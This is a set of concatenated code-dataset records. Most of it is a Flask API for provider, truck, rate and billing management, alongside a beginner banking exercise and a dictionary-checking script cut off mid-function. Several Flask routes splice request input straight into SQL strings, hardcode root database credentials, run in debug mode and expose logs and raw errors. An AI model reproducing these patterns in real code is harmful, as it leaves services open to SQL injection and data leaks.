callback=aggregate_resut)\n\njob_server.wait()\n\nprint(\"Main process PID [%d]\" % os.getpid())\nfor key, value in result_dict.items():\n print(\"For input %d, %s\" % (key, value))","sub_path":"ppalgo/parallel_algorithms/pp_fibo.py","file_name":"pp_fibo.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33651001","text":"from flask import Flask, request, jsonify, Response ,send_from_directory , render_template ,json\nfrom openpyxl import Workbook , load_workbook\nfrom flask_cors import CORS, cross_origin\nfrom datetime import datetime\nimport mysql.connector\nimport xlsxwriter\nimport requests\nimport logging\nimport os.path\nimport json\nimport bill\nimport csv\n\n\n#ERROR CODES \n#(0) - SUCCESS\n#(-1) - 500 INTERNAL SERVER ERROR\n#(-2) - DATABASE CONNECTION ERROR (HTTP error 503 Service Unavailable)\n#(-3) - ERROR EXECUTING QUERY IN DATABASE\n#(-4) - I/O ERROR\n#(-5) - USER ERROR MISSING PARAMETER IN URL QUERY (HTTP error 400 Bad Request Error)\n\n\napp = Flask(__name__)\n\n# General setups and defenitions\nlogging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')\n\ndef getMysqlConnection():\n return mysql.connector.connect(user='root', host='mysql', port='3306', password='root', database='billdb')\n\n@cross_origin()\n\n#---------------------------------------------------\n# START API ROUTES AND FUNCTIONS\n#---------------------------------------------------\n\n# Default page\n@app.route(\"/\")\ndef hello():\n return render_template('ProviderMainPage.html')\n\n# GET /health\n# - By default returns \"OK\" and status 200 OK\n# -If system depends on external resources (e.g. db), \n# and they are not available (e.g. \"select 1;\" fails ) \n# then it should return \"Failure\" and 500 Internal Server Error\n@app.route('/health', methods=['GET'])\ndef checkhealth():\n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n try:\n query = \"SELECT 1\"\n cur = db.cursor()\n cur.execute(query)\n result = cur.fetchall()\n logging.info('[GET][SUCCESS] health request . QUERY:' + query)\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" }) , 200 \n except Exception as e:\n logging.error('[GET][FAILURE] /health request . QUERY:' + query)\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500 \n finally:\n logging.info(\"200 OK\")\n db.close()\n\n# POST /provider\n# Creates a new provider record:\n# - name - provider name. must be unique.\n# Returns a unique provider id as json: { \"id\":}\n@app.route('/provider/', methods=['POST'])\ndef insert_provider(provider_name):\n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n\n try:\n query_string = \"INSERT INTO Provider (name) \"\n query_string += \"SELECT * FROM (SELECT '\" + provider_name + \"') AS tmp \"\n query_string += \"WHERE NOT EXISTS (\"\n query_string += \"SELECT name FROM Provider WHERE name = '\" + provider_name + \"'\"\n query_string += \") LIMIT 1;\"\n cur = db.cursor() \n cur.execute(query_string)\n db.close()\n logging.info(\"[POST][SUCCESS] provider/%s\", (provider_name,))\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"result\": \"MYSQL query completed\"}) , 200\n except Exception as e:\n logging.info('[POST][FAILURE] while trying:', str(e))\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500 \n\n# PUT /provider/{id} can be used to update provider name \n@app.route('/provider', methods=['PUT'])\ndef putprovider():\n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n try:\n json = request.get_json()\n id = str(json[\"id\"])\n newname = str(json[\"newname\"])\n except:\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"ERROR/WRONG NO PARAMETERS PASSED\" }) , 400\n try: \n cur = db.cursor() \n cur.execute('UPDATE Provider SET name = ' + '\"' + str(newname)+ '\"' + ' WHERE id =' + id)\n except:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 500\n try:\n db.commit()\n cur.close()\n db.close()\n logging.info('[PUT][SUCCESS] provider/') \n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" }) , 200\n except Exception as e:\n logging.error('[PUT][FAILURE] provider/') \n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n# POST /truck\n# registers a truck in the system\n# - provider - known provider id\n# - id - the truck license plate\n# This request needs two argumnets.\n# Implenting as a query string in url\n# http://localhost:5000/truck?id=222-33-111&name=new_provider_for_truck\n@app.route('/truck', methods=['POST'])\ndef inserttruck():\n # get values from query string\n result_message = \"\"\n result_count_string = \"\"\n truck_id = \"\"\n provider_name = \"\"\n if request.args.get('id') != None:\n truck_id = request.args.get('id')\n else:\n logging.error('[POST][FAILURE] /truck : USER ERROR : MISSING PARAMETER IN URL QUERY')\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }) , 400\n\n if request.args.get('name'):\n provider_name = request.args.get('name')\n else:\n logging.error('[POST][FAILURE] /truck : USER ERROR : MISSING PARAMETER IN URL QUERY')\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }), 400\n \n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n \n try:\n cur = db.cursor()\n # get id of provider (owner of the truck id)\n querystr = \"SELECT id FROM Provider WHERE name = '\" + provider_name + \"'\"\n cur.execute(querystr)\n query_result = cur.fetchall()\n result_count_string = \" Result count: \" + str(cur.rowcount)\n if cur.rowcount > 0: # test if there is at least one record\n provider_id = str(query_result[0][0])\n # count how many records have the desired truck id\n querystr = \"SELECT COUNT(IF(id='\" + truck_id + \"',1, NULL)) 'id' FROM Trucks\"\n cur.execute(querystr)\n query_result = cur.fetchall()\n if int(query_result[0][0]) > 0: # if more than 0, then don't create the new record.\n result_message = \"[POST][FAILURE] /truck : Truck no: \" + truck_id + \" already exists! Cant create new truck record with the same id.\"\n logging.info(result_message)\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n else: # Truck is doesn't exsists -> create new record in table\n querystr = \"INSERT INTO Trucks (`id`,`provider_id`) VALUES ('\" + truck_id + \"', \" + provider_id + \")\"\n cur.execute(querystr)\n cur.close()\n db.close()\n result_message = \"[POST][SUCCESS] /truck : Added new truck no: \" + truck_id + \" for provider: \" + provider_name\n logging.info(result_message)\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n else: # No id of provider (owner of the truck id)\n result_message = \"No provider with this name: \" + provider_name\n logging.info(result_message)\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n except Exception as e:\n logging.error('[POST][FAILURE] /truck : QUERY:' + querystr +\" == \" + str(e))\n #return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n return str(e) + \"\\n\" + querystr\n\n# PUT /truck/{id} can be used to update provider id\n# This request needs two argumnets.\n# Implenting as a query string in url\n# http://localhost:5000/truck?id=222-33-111&name=new_provider_for_truck\n@app.route('/truck', methods=[\"PUT\"])\ndef updatetruck():\n # get values from query string\n result_message = \"\"\n result_count_string = \"\"\n truck_id = \"\"\n provider_name = \"\"\n if request.args.get('id') != None:\n truck_id = request.args.get('id')\n else:\n logging.error('[PUT][FAILURE] /truck/ : USER ERROR : MISSING PARAMETER IN URL QUERY')\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }) , 400\n\n if request.args.get('name'):\n provider_name = request.args.get('name')\n else:\n logging.error('[PUT][FAILURE] /truck/ : USER ERROR : MISSING PARAMETER IN URL QUERY')\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"USER ERROR MISSING PARAMETER IN URL QUERY\" }) , 400\n \n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n \n try:\n cur = db.cursor()\n # get id of provider (owner of the truck id)\n querystr = \"SELECT id FROM Provider WHERE name = '\" + provider_name + \"'\"\n cur.execute(querystr)\n query_result = cur.fetchall()\n result_count_string = \" Result count: \" + str(cur.rowcount)\n if cur.rowcount > 0: # test if there is at least one record\n provider_id = str(query_result[0][0])\n # count how many records have the desired truck id\n querystr = \"SELECT COUNT(IF(id='\" + truck_id + \"',1, NULL)) 'id' FROM Trucks\"\n cur.execute(querystr)\n query_result = cur.fetchall()\n if int(query_result[0][0]) > 0: # if more than 0, then update the record.\n querystr = \"UPDATE Trucks SET provider_id = '\" + provider_id + \"' WHERE id = '\" + truck_id + \"'\" \n cur.execute(querystr)\n db.commit()\n cur.close()\n db.close()\n result_message = \"[PUT][SUCCESS] /truck/ : Updated Truck no: \" + truck_id + \" for provider: \" + provider_name\n logging.info(result_message)\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n else:\n result_message = \"No Truck ID with this id: \" + truck_id\n logging.info(result_message)\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n else: # No id of provider (owner of the truck id)\n result_message = \"No provider with this name: \" + provider_name\n logging.info(result_message)\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"status 200 OK\" , \"result\": result_message}) , 200 \n except Exception as e:\n logging.error('[PUT][FAILURE] /truck/ : QUERY:' + querystr)\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n\n# GET /truck/?from=t1&to=t2\n# - id is the truck license. 404 will be returned if non-existent\n# - t1,t2 - date-time stamps, formatted as yyyymmddhhmmss. server time is assumed.\n# default t1 is \"1st of month at 000000\". default t2 is \"now\". \n# Returns a json:\n# { \"id\": ,\n# \"tara\": , // last known tara in kg\n# \"sessions\": [ ,...] \n#}\n@app.route('/truck/', methods=[\"GET\"]) #?from=t1&to=t2\ndef truckinfo(id):\n try:\n fromm = str(request.args.get('from'))\n to = str(request.args.get('to'))\n resp = requests.get('http://green.develeap.com:8080/item/'+ id +' ?from='+ fromm +'&to='+ to +'')\n json_content = json.dumps(resp.json())\n return '{ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"data\" :' + str(json_content) + ' }' , 200\n \n #return id\n #return id+str(request.args.get('from')+str(request.args.get('to')))\n #db = getMysqlConnection()\n #cur = db.cursor() \n #cur.execute('SELECT id , provider_id FROM Trucks WHERE id='+'\"' + id + '\"')\n #results = cur.fetchall()\n #return str(results)\n ##HERE WE SHOULD MAKE A REQUEST TO WEIGHT API AND GET WITH THE ID BETWEEN DATES BY ID ?\n #db.commit()\n #cur.close()\n #db.close()\n #logging.info('[GET][SUCCESS] /truck/') # CHANGE TO PROPER MESSAGE\n #tempJson = { \"id\"}\n #return \"OK\"\n except Exception as e:\n logging.error('[GET][FAILURE] /truck/') # CHANGE TO PROPER MESSAGE\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n\n# POST /rates\n# - file=\n# Will upload new rates from an excel file in \"/in\" folder. Rate excel has the following columns:\n# - Product - a product id\n# - Rate - integer (in agorot)\n# - Scope - ALL or A provider id. \n# The new rates over-write the old ones\n# A scoped rate has higher precedence than an \"ALL\" rate\n@app.route(\"/rates\",methods=[\"POST\"])\ndef postrates():\n #filename = \"./in/rates.xlsx\"\n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n try:\n filename_tmp = request.get_json()\n filename = str(filename_tmp[\"file\"])\n except:\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"NO PARAMETERS PASSED\" }) , 500\n \n try:\n wb = load_workbook(\"./in/\" + filename)\n except: \n return jsonify({ \"errorCode\" : -4 , \"errorDescription\" : \"FILE NOT FOUND\" }) , 500\n try:\n ws = wb.get_active_sheet()\n cur = db.cursor()\n cur.execute('TRUNCATE TABLE Rates') \n query = \"INSERT INTO Rates (product_id, rate, scope) VALUES (%s, %s, %s)\" #INSERT\n except:\n return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"DB ERROR WRONG PARAMETERS PASSED\" }) , 500\n \n try: \n row = 2\n while ws.cell(row, 1).value is not None:\n product = ws.cell(row, 1).value\n rate = ws.cell(row, 2).value\n scope = ws.cell(row, 3).value\n i_tuple = (product, rate, scope)\n cur.execute(query, i_tuple)\n row += 1\n db.commit()\n cur.close()\n db.close()\n logging.info('[POST][SUCCESS] /rates ') # CHANGE TO PROPER MESSAGE\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" }) , 200\n except Exception as e:\n logging.error('[POST][FAILURE] /rates') # CHANGE TO PROPER MESSAGE\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500\n\n\n# GET /rates\n# Will download a copy of the same excel that was uploaded using POST /rates\ndef json_to_excel(ws, data, row=0, col=0):\n ws.write('A1', 'Product')\n ws.write('B1', 'Rate')\n ws.write('C1', 'Scope')\n row += 1\n for product_id, rate, scope in data:\n ws.write(row, col, str(product_id))\n ws.write(row, col + 1, str(rate))\n ws.write(row, col + 2, str(scope))\n row += 1\n\n@app.route('/rates', methods=['GET'])\ndef get_rates():\n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n try:\n sqlstr = \"SELECT * FROM Rates\"\n cur = db.cursor()\n cur.execute(sqlstr)\n output_jason = cur.fetchall()\n db.close()\n logging.info(\"[GET][SUCCESS] rates request - : %s\", (sqlstr))\n except Exception :\n logging.error(\"[GET][FAILURE] rates request , ON QUERY: %s\", (sqlstr))\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 500\n try: # Create and save Excel file\n dir_name = \"out\"\n file_name = \"output.xlsx\"\n excel_path = \"./\" + dir_name + \"/\" + file_name\n data = output_jason\n wb = xlsxwriter.Workbook(excel_path)\n ws = wb.add_worksheet()\n json_to_excel(ws, data)\n wb.close()\n logging.info(\"[GET][SUCCESS] rates request : Excel file created in: %s\", (excel_path))\n except:\n logging.error(\"[GET][FAILURE] rates request : Excel file NOT created in: %s\", (excel_path))\n return jsonify({ \"errorCode\" : -4 , \"errorDescription\" : \"I/O ERROR : writing Excel file\" }) , 500\n try: # send excel file as http response\n if os.path.exists(excel_path):\n logging.info(\"[GET][SUCCESS] rates request : Excel file from: %s was sent for download\", (excel_path))\n return send_from_directory(dir_name, filename=file_name, as_attachment=True, attachment_filename=\"Rates.xlsx\", mimetype=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\")\n except:\n logging.error(\"[GET][FAILURE] rates request : Excel file from: %s was NOT sent for download\", (excel_path))\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"status 404 Not Found : Excel file not found\" }) , 500\n\n# GET /bill/?from=t1&to=t2\n# - id is provider id\n# - t1,t2 - date-time stamps, formatted as yyyymmddhhmmss. server time is assumed.\n# default t1 is \"1st of month at 000000\". default t2 is \"now\". \n# Returns a json:\n# {\n# \"id\": ,\n# \"name\": ,\n# \"from\": ,\n# \"to\": ,\n# \"truckCount\": ,\n# \"sessionCount\": ,\n# \"products\": [\n# { \"product\":,\n# \"count\": , // number of sessions\n# \"amount\": , // total kg\n# \"rate\": , // agorot\n# \"pay\": // agorot\n# },...\n# ],\n# \"total\": // agorot\n# }\n@app.route('/bill/', methods=[\"GET\"])\ndef getbilling(id):\n try:\n # id\n result={\"id\" : id}\n # name\n name1 = bill.get_provider_name(id)\n if name1 == -2:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 200\n elif name1 == -3:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 200\n elif name1 == None:\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"provider id not in database\" }) , 500 \n name= bill.get_provider_name(id)[0]\n result.update({\"name\" : name})\n # t1 & t2\n now = datetime.now()\n t1 = now.strftime(\"%Y%m01000000\")\n t2 = now.strftime(\"%Y%m%d%H%M%S\")\n if request.args.get('from')!=None:\n t1 = request.args.get('t1')\n if request.args.get('to')!=None:\n t2 = request.args.get('t2')\n result.update({ \"from\" : t1 })\n result.update({ \"to\" : t2 })\n trucks_list=bill.find_providers_trucks(id)\n if trucks_list == -2:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 200\n elif trucks_list == -3:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 200 \n weights_list=bill.get_all_sessions_in_array(t1,t2)\n # tests for api \n rates_dictionary=bill.get_rates()\n if rates_dictionary == -2:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 200\n elif rates_dictionary == -3:\n return jsonify({ \"errorCode\" : -3 , \"errorDescription\" : \"ERROR EXECUTING QUERY IN DATABASE\" }) , 200 \n \n # sessionCount\n GlobalSessionsCount=0\n # products\n products=[]\n # truck_in_weights\n trucks_in_weights = set()\n # foreach truck - look for its sessions/weights\n for truck in trucks_list:\n truck_number = str(truck[0])\n truck_sessions_count=0\n for weight in weights_list:\n if weight[\"truck\"] == truck_number:\n truck_sessions_count += 1\n GlobalSessionsCount += 1\n trucks_in_weights.add(truck_number)\n # if product exist in products - update it\n flag = False\n for obj in products:\n if weight[\"produce\"]==obj[\"product\"]:\n flag = True\n amount = int(weight[\"neto\"]) + int(obj[\"amount\"])\n count = int(obj[\"count\"]) +1\n pay = amount * int(obj[\"rate\"])\n obj.update({ \"amount\" : amount , \"count\" : count , \"pay\" : pay})\n logging.info('[GET][SUSSECC] /bill/ : product dictinary updated for'+ weight[\"produce\"])\n if flag == False:\n product=dict()\n rate = 0\n for obj in rates_dictionary:\n if obj[\"product_id\"] == weight[\"produce\"]: \n if obj[\"scope\"] == id:\n rate = int(obj[\"rate\"]) \n break\n elif obj[\"scope\"] == \"All\" :\n rate = int(obj[\"rate\"]) \n # pay\n pay = int(weight[\"neto\"]) * int(rate)\n product = { \"product\" : weight[\"produce\"] , \"count\" : 1 , \"amount\" : int(weight[\"neto\"]) , \"rate\" : int(rate) , \"pay\" : int(pay) }\n logging.info('[GET][SUSSECC] /bill/ : product dictinary created for'+ weight[\"produce\"])\n products.append(product)\n # return jsonify(products)\n # set total\n total=0\n for obj in products:\n total += int(obj[\"pay\"])\n result.update({ \"truckCount\" : len(trucks_in_weights) , \"sessionCount\" : GlobalSessionsCount , \"products\" : products , \"total\" : total })\n logging.info('[GET][SUSSECC] /bill/ : result dictinary updated with all data')\n \n \n logging.info('[GET][SUCCESS] /bill/ : return result as JSON')\n return jsonify(result) , 200 \n except Exception as e:\n logging.error('[GET][FAILURE] /bill/ : '+ str(e))\n # return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500 \n return str(e)\n\n\n@app.route('/getlogs', methods=[\"GET\"])\ndef getlogs():\n try:\n with open('app.log', 'r') as file:\n return file.read()\n except Exception as e:\n logging.error('file not found')\n return str(e)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True,host='0.0.0.0')\n","sub_path":"providers/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"73810471","text":"#transactionsThisMonth is assigned an int\ntransactionsThisMonth = 1\n\n#accountBalance is assigned a float\naccountBalance = 555.55\n\n#firstname, lastname, accountNUmber, and pin are assigned strings\nfirstName = \"Marc\"\nlastName = \"Hauschildt\"\naccountNumber = \"k0519415\"\npin = \"1234\"\n\n# Start writing text \n#active is assigned a boolean\nactive = True\n# Add these lines after the \"active = True\" statement\nPROCESSING_FEE = 2.00\nINTEREST_RATE = 0.019\n\npinInput = str(input(\"What is your pin?\"))\n\n# add the remaining lines after the \"Your account balance is...\" statement\nwithdrawInput = float(input(\"\\nHow much would you like to withdraw? \")) \n\n# Place this code above the \"Rate your experience\" input\nprint(\"\\nThis transaction includes a $\" + format(PROCESSING_FEE, \".2f\"), \"processing fee.\")\naccountBalance = accountBalance - withdrawInput - PROCESSING_FEE\ninterestEarned = accountBalance * (INTEREST_RATE / 12)\nprint(\"Congratulations, your account earned $\" + format(interestEarned, \".2f\"), \"in interest this month.\")\naccountBalance = accountBalance + interestEarned\nprint(\"\\nYour updated account balance is $\" + format(accountBalance, \"5.2f\"))\ntransactionsThisMonth += 1\nprint(\"You have made\", str(transactionsThisMonth), \"transactions this month.\")\n\nratingInput = int(input(\"\\nRate your experience today (1-Bad, 5-Great): \"))\nprint(type(pinInput), type(withdrawInput), type(ratingInput))\n\n# Don't do this when you want to add two numbers. The + sign means concatenate when dealing with strings\nnum1 = input(\"Enter a number: \")\nprint(num1)\nnum2 = input(\"Enter another number: \")\nprint(num1 + num2)\n\n# Do this instead\nnum1 = int(input(\"Enter a number: \"))\nnum2 = int(input(\"Enter another number: \"))\nprint(num1 + num2)","sub_path":"chapter2.py","file_name":"chapter2.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"144190562","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport codecs\r\nimport pickle\r\nimport cPickle\r\nfrom OffsetDump import KiwiDataManager\r\n\r\n# set log\r\nimport CheckLog\r\nlog = CheckLog.get_file_log('VrDicCheck.log')\r\n\r\n\r\nclass DicItemParamError(Exception): pass\r\n\r\nclass DicItem:\r\n\t_folder = r''\r\n\t_kiwiDataManager = None\r\n\t\"\"\" \"\"\"\r\n\tdef __init__(self, linestr, father):\r\n\t\tself._linestr = linestr\r\n\t\tself._children = None\r\n\t\tself._father = father\r\n\t\tself._kiwiRecord = None\r\n\t\tself._kiwiFrame = None\r\n\t\tself._checked = False\r\n\t\tself._type = None\r\n\t\t# parse attributes from line string\r\n\t\t# 'Name\tPinYin\tNextLevelId\tNextLevelInfo\tOffset VoiceId\tNextLevelNumber'\r\n\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w ]+)\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{4})\\r\\n$', \\\r\n\t\t\t\tself._linestr)\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str()[:-2])\r\n\t\t\tlog.warning(r'I try to match pinyin with \"/\"')\r\n\t\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w /]+)\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{8})\\t(0x[\\dA-F]{4})\\r\\n$', \\\r\n\t\t\t\tself._linestr)\r\n\t\t\tif pat:\r\n\t\t\t\tlog.warning(r'Try match pinyin with \"/\" successfully')\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\t# remove '\\r\\n' at the end of each line\r\n\t\tself._linestr = self._linestr[:-2]\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], linestr)\r\n\t\t\traise DicItemParamError()\r\n\t\tself._name = pat.group(1)\r\n\t\tself._pinyin = pat.group(2)\r\n\t\tself._nextLevelId = pat.group(3)\r\n\t\tself._nextLevelInfo = pat.group(4)\r\n\t\tself._offset = pat.group(5)\r\n\t\tself._voiceId = pat.group(6)\r\n\t\tself._nextLevelNum = pat.group(7)\r\n\t\tself._attrs = { \r\n\t\t\t\t1: self._name, 'name': self._name,\r\n\t\t\t\t2: self._pinyin, 'pinyin':self._pinyin,\r\n\t\t\t\t3: self._nextLevelId, 'nextLevelId': self._nextLevelId,\r\n\t\t\t\t4: self._nextLevelInfo, 'nextLevelInfo': self._nextLevelInfo,\r\n\t\t\t\t5: self._offset, 'offset': self._offset,\r\n\t\t\t\t6: self._voiceId, 'voiceId': self._voiceId,\r\n\t\t\t\t7: self._nextLevelNum, 'nextLevelNum': self._nextLevelNum\r\n\t\t\t\t}\r\n\r\n\tdef get_str(self):\r\n\t\treturn self._linestr\r\n\t\r\n\tdef check(self):\r\n\t\t\" Check the item itself only. \\n\"\r\n\t\tchecker = DicItemChecker(self)\r\n\t\tr = checker.check()\r\n\t\tif r:\r\n\t\t\t#log.debug(r' : %s', self.get_str())\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\treturn (r, checker)\r\n\t\r\n\tdef check_recursively(self):\r\n\t\t\" Check recursively.\\n\"\r\n\t\tif self._checked:\r\n\t\t\treturn True\r\n\t\tself._checked = True\r\n\t\t(result, checker) = self.check()\r\n\t\t# has checked another name of this item, do not to check children\r\n\t\tif checker.checked_another_name():\r\n\t\t\treturn result\r\n\t\t# check children recursively\r\n\t\tfor child in self.get_children():\r\n\t\t\tif not child.check_recursively():\r\n\t\t\t\tresult = False\r\n\t\treturn result\r\n\r\n\tdef has_child(self):\r\n\t\tif self['nextLevelId'] != '0xFFFFFFFF' \\\r\n\t\t\t\tor self['nextLevelInfo'] != '0x00000001' \\\r\n\t\t\t\tor self['nextLevelNum'] != '0x0000':\r\n\t\t\t# check all the info should all say ' has next level'\r\n\t\t\tif not (self['nextLevelId'] != '0xFFFFFFFF' \\\r\n\t\t\t\t\tand self['nextLevelInfo'] != '0x00000001' \\\r\n\t\t\t\t\tand self['nextLevelNum'] != '0x0000'):\r\n\t\t\t\tlog.warning(' : %s : %s', self.get_father()['nextLevelId'], self._linestr)\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\t# check all the info should all say ' not have next level'\r\n\t\t\tif not (self['nextLevelId'] == '0xFFFFFFFF' \\\r\n\t\t\t\t\tand self['nextLevelInfo'] == '0x00000001' \\\r\n\t\t\t\t\tand self['nextLevelNum'] == '0x0000'):\r\n\t\t\t\tlog.warning(' : %s : %s', self.get_father()['nextLevelId'], self._linestr)\r\n\t\t\treturn False\r\n\r\n\tdef get_father(self):\r\n\t\treturn self._father\r\n\r\n\tdef get_children(self):\r\n\t\tif self._children != None:\r\n\t\t\treturn self._children\r\n\t\telif not self.has_child():\r\n\t\t\treturn tuple()\r\n\t\tchildren_set = []\r\n\t\tfilename = self['nextLevelId'][2:]+'.txt'\r\n\t\tfilepath = os.path.join(self._folder, filename)\r\n\t\t# open file and read lines\r\n\t\ttry:\r\n\t\t\tfp = codecs.open(filepath,encoding='gbk')\r\n\t\t\tlines = fp.readlines()\r\n\t\t\tfp.close()\r\n\t\texcept IOError:\r\n\t\t\tlog.warning(r' : %s : %s ', self.get_father()['nextLevelId'], self._linestr)\r\n\t\t\treturn tuple()\r\n\t\texcept UnicodeDecodeError:\r\n\t\t\tlog.warning(r' : %s : %s : %s', self.get_father()['nextLevelId'], self._linestr, filename)\r\n\t\t\tfp.close()\r\n\t\t\treturn tuple()\r\n\t\t# parse each line to a DicItem, and add the DicItems to children_set\r\n\t\tfor s in lines:\r\n\t\t\tif re.match(r'^\\s*$',s):\r\n\t\t\t\tlog.warning(r' : Filename: %s', filename)\r\n\t\t\t\tcontinue\r\n\t\t\ttry:\r\n\t\t\t\tdicItem = DicItem(s, self)\r\n\t\t\texcept DicItemParamError:\r\n\t\t\t\tlog.warning(r' : %s\tFileName : %s', self._linestr, filename)\r\n\t\t\t\tcontinue\r\n\t\t\tchildren_set.append(dicItem)\r\n\t\tself._children = tuple(children_set)\r\n\t\treturn self._children\r\n\r\n\tdef __getitem__(self, attr):\r\n\t\t' Return a string.\\n'\r\n\t\treturn self._attrs[attr]\r\n\r\n\tdef is_root(self):\r\n\t\treturn False\r\n\t\r\n\tdef _fetch_kiwi_record(self):\r\n\t\t# root, process in DicRootItem\r\n\t\t#if self.is_root():\r\n\t\t#\treturn None\r\n\t\tf = self.get_father()\r\n\t\t# root -> province\r\n\t\tif f.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\tff = f.get_father()\r\n\t\t# root -> province -> city\r\n\t\tif ff.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(f['name'], self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\tfff = ff.get_father()\r\n\t\t# root -> province -> city -> town\r\n\t\tif fff.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(ff['name'], f['name'], self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\tffff = fff.get_father()\r\n\t\t# root -> province -> city -> town -> 